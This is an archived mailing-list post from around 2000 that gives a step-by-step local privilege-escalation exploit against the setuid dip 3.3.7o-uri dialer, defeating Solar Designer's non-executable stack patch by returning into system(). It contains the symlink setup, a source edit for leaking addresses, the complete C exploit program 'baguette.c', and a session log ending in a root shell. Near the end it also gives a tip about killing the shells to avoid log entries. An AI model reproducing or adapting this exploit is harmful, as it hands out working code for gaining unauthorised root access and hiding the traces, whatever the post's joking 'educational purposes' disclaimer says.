Hi,
After reading jamez's and zef's postings about dip and reviewing
its sourcecode, I recalled Rafal Wojtczuk (nergal)'s post about defeating
Solar Designer's non-executable stack. I asked myself "Hmmm, let's see if
we can get a shell out of it even on a system with installed stackpatch."
So I develpoed the following recipe:
First, setup your directory like this:
-----------------------------------------------------------
ln -s /bin/sh a
ln -s /bin/sh aa
ln -s /bin/sh aaa
ln -s /bin/sh aaaa
ln -s /bin/sh aaaaa
ln -s /bin/sh aaaaaa
ln -s /bin/sh aaaaaaa
ln -s /usr/sbin/dip vul
-----------------------------------------------------------
Get the dip-3.3.7o-uri package and uncompress it. Take main.c and edit
it the following (preferably with vi !! :) ) :
------------------ dip-3.3.7o/main.c line 194+ -----------------------------
fp = fopen(buf, "r");
if (fp == (FILE *)0) {
fprintf(stderr, "DIP: cannot open %s: %s\n",
buf, strerror(errno));
+ fprintf(stderr, "labels: %p %p\n", &system, nam);
return;
}
----------------------------------------------------------------------------
Of course you can juat use gdb and issue the "p system" command as well, that
avoids getting the package.
Now compile and run it, you get:
----------------------------------------------------------------------------
pigsnspace$ dip -k -l aaaa
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /usr/spool/uucp/LCK..aaaa: No such file or directory
labels: 0x80493e8 0xbffff6f0
----------------------------------------------------------------------------
Insert the first number you get into the following exploit:
-------------------------- baguette.c --------------------------------
/*
* Programm to get a shell from dip-3.3.7o-uri on a system with
* Solar Designer's stackpatch installed.
* by tstroegeat_private-erlangen.de
* credits to jamez, zef and especially
* Rafal Wojtczuk for his howto ;)
*
* Of course this is just for educational purposes :)
*/
#include <stdio.h>
#define SYSTEM 0x80493e8
/* address of system entry */
#define SOMESTACK 0xbffffea0
/* adress on stack where argv[1] should be. Usually somewhere on top */
int main(int argc, char *argv[]) {
char *name[]={"./vul", "-k", "-l", NULL, NULL};
char mem[1024], *ptr;
int i, code[]={ SYSTEM, SOMESTACK, SOMESTACK, 0 }, off=atoi(argv[1]);
for (ptr=mem, i=0; i < 1024; i+=8, ptr+=8) memcpy(ptr, "aaaaaaa;", 8);
ptr=mem+off;
strcpy(ptr, (char *)&(code[0]));
mem[1023]=0;
name[3]=(char *)mem;
printf("%s (%d/%d)\n", mem, strlen(mem), off);
execve(name[0], name, NULL);
return 0;
}
----------------------------------------------------------------------
(SOMESTACK is someway above 0xbffff6f0, here it was 0xbffffea0)
Running this program should do. On my platform offset 113 did the job:
----------------------------------------------------------------------
pigsnspace$ gcc baguette.c -o exp
pigsnspace$ id
uid=1047(piggy) gid=100(users) groups=100(users)
pigsnspace$ ./exp 113
aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿ (125/113)
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /var/lock/LCK..aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aè þÿ¿ þÿ¿: No such file or directory
pigsnspace# id
uid=1047(piggy) gid=100(users) euid=0(root) groups=100(users)
----------------------------------------------------------------------
Well, so much to this. You should keep in mind that getting the right offset
value (the 113 somewhere above) and the address of SYSTEM and SOMESTACK can
be difficult. Most probably this program will not work at once (see more about
it in nergals article). Those values worked here, but you will have to
experiment.
After exiting the neat shells, you'll get a systerm log. So you should
maybe just kill them using kill ......
tst.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:53:24 PDT